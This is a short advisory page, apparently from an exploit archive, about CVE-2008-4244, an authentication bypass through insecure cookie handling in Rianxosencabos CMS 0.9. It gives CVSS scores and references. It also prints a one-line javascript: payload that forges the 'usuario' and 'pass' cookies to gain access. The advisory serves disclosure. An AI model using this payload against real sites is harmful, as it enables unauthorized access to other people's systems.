Bug: Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability ( Ascii Version )

Search:
WLB2

Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability

Published
Credit
Risk
2008.09.27
Stack
High
CWE
CVE
Local
Remote
CWE-287
CVE-2008-4244
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

###############################################################################################
[+] Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
################################################################################################
---
exploit:
javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";

References:

http://xforce.iss.net/xforce/xfdb/45291
http://www.securityfocus.com/bid/31292

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version